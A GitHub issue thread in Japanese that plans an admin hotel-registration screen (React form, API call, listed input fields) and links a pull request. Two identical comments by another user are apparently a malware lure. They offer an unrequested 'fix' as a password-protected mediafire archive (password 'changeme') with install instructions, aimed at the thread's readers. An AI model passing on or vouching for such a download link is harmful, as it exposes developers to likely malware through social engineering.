### ISSUE TITLE
【管理】ホテルの登録画面を作成しよう

### ISSUE THREAD

**Issue by railgun-0402** [railgun-0402/React_Spring_Front#8]
# 概要
React-Fromを使用して、画面からAPIを呼び出し新規登録処理を実現する。

## 画面遷移
管理側のホテル一覧にある、「新規登録」ボタンを押下すること

## 入力内容

- ホテル名
- 画像
- 説明
- 宿泊料金（円/一泊）
- 定員
- 郵便番号
- 住所
- 電話番号

**Comment by rickdoq** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by rickdoq** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by railgun-0402** [comment]
とりあえず画面は作成済
https://github.com/railgun-0402/React_Spring_Front/pull/9

APIの方が完了次第、連携を実施する。
